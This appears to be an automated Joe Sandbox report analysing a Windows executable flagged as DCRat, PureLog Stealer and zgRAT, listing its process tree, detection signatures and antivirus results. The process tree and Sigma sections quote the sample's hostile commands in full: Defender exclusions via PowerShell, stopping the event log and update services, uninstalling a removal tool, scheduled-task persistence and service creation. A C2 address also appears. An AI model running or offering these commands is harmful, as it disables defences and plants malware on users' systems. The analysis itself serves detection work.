Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Overview

General Information

Sample name:C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Analysis ID:1431496
MD5:6acbb1fb58dccd74db667187b22de689
SHA1:cf0df5b247b15157cfce47473d1b063705d10b44
SHA256:c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe" MD5: 6ACBB1FB58DCCD74DB667187B22DE689)
    • GargantuaN.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" MD5: B3CEE15E9FDDC0E7DC33069319B549D6)
      • wscript.exe (PID: 7564 cmdline: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • hyperProviderSavesinto.exe (PID: 7836 cmdline: "C:\PerfDll/hyperProviderSavesinto.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
            • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8004 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8032 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7072 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6692 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 3272 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7272 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 7916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • GargantuanS.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" MD5: 7A568EF3F46D369F3D3FFD68FDF68573)
      • powershell.exe (PID: 7632 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7260 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5640 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1068 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7468 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7768 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 7964 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe delete "IFAYFBKT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8032 cmdline: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7676 cmdline: C:\Windows\system32\sc.exe start "IFAYFBKT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • KZcLqgnLvRf.exe (PID: 8116 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
  • KZcLqgnLvRf.exe (PID: 8176 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
  • nhxnqwkhmssh.exe (PID: 7844 cmdline: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe MD5: 7A568EF3F46D369F3D3FFD68FDF68573)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\PerfDll\hyperProviderSavesinto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\PerfDll\hyperProviderSavesinto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 9 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: hyperProviderSavesinto.exe PID: 7836JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 1 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      1.3.GargantuaN.exe.584d6eb.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        1.3.GargantuaN.exe.584d6eb.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          1.3.GargantuaN.exe.6dc96eb.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            1.3.GargantuaN.exe.6dc96eb.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              1.3.GargantuaN.exe.6dc96eb.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 3 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Files With System Process Name In Unsuspected Locations
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\PerfDll\hyperProviderSavesinto.exe, ProcessId: 7836, TargetFilename: C:\Recovery\WmiPrvSE.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7632, ProcessName: powershell.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7632, ProcessName: powershell.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, ParentProcessId: 7508, ParentProcessName: GargantuaN.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , ProcessId: 7564, ProcessName: wscript.exe
                                Sigma detected: New Service Creation Using Sc.EXE
                                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", ProcessId: 8032, ProcessName: sc.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7632, ProcessName: powershell.exe

                                Persistence and Installation Behavior

                                barindex
                                Sigma detected: Schedule system process
                                Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\PerfDll/hyperProviderSavesinto.exe", ParentImage: C:\PerfDll\hyperProviderSavesinto.exe, ParentProcessId: 7836, ParentProcessName: hyperProviderSavesinto.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, ProcessId: 8096, ProcessName: schtasks.exe

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Sigma detected: Stop EventLog
                                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8084, ProcessName: sc.exe

                                Snort Signatures

                                Timestamp:04/25/24-10:32:09.038045
                                SID:2048095
                                Source Port:49730
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://176.123.168.151Avira URL Cloud: Label: malware
                                Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/WindowsAvira URL Cloud: Label: malware
                                Source: http://176.123.168.151Avira URL Cloud: Label: malware
                                Source: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/WindowAvira URL Cloud: Label: malware
                                Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.phpAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeAvira: detection malicious, Label: TR/Kryptik.gqhhv
                                Source: C:\Users\user\Desktop\zQhPhksn.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\AppData\Local\Temp\sB1sK52ORC.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\PerfDll\hyperProviderSavesinto.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\Desktop\WiKMUFpI.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Recovery\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeAvira: detection malicious, Label: TR/Kryptik.gqhhv
                                Source: C:\Users\user\Desktop\LugVktua.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Source: C:\Users\user\Desktop\KEMGRwnV.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Multi AV Scanner detection for domain / URL
                                Source: https://176.123.168.151Virustotal: Detection: 5%Perma Link
                                Source: http://176.123.168.151Virustotal: Detection: 8%Perma Link
                                Multi AV Scanner detection for dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeReversingLabs: Detection: 87%
                                Source: C:\PerfDll\hyperProviderSavesinto.exeVirustotal: Detection: 73%Perma Link
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeReversingLabs: Detection: 87%
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeVirustotal: Detection: 73%Perma Link
                                Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeReversingLabs: Detection: 81%
                                Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeVirustotal: Detection: 61%Perma Link
                                Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 87%
                                Source: C:\Recovery\RuntimeBroker.exeVirustotal: Detection: 73%Perma Link
                                Source: C:\Recovery\WmiPrvSE.exeReversingLabs: Detection: 87%
                                Source: C:\Recovery\WmiPrvSE.exeVirustotal: Detection: 73%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeVirustotal: Detection: 52%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeVirustotal: Detection: 61%Perma Link
                                Source: C:\Users\user\Desktop\IkSFhrpY.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\KEMGRwnV.logReversingLabs: Detection: 66%
                                Source: C:\Users\user\Desktop\KEMGRwnV.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\LugVktua.logVirustotal: Detection: 19%Perma Link
                                Source: C:\Users\user\Desktop\WiKMUFpI.logReversingLabs: Detection: 66%
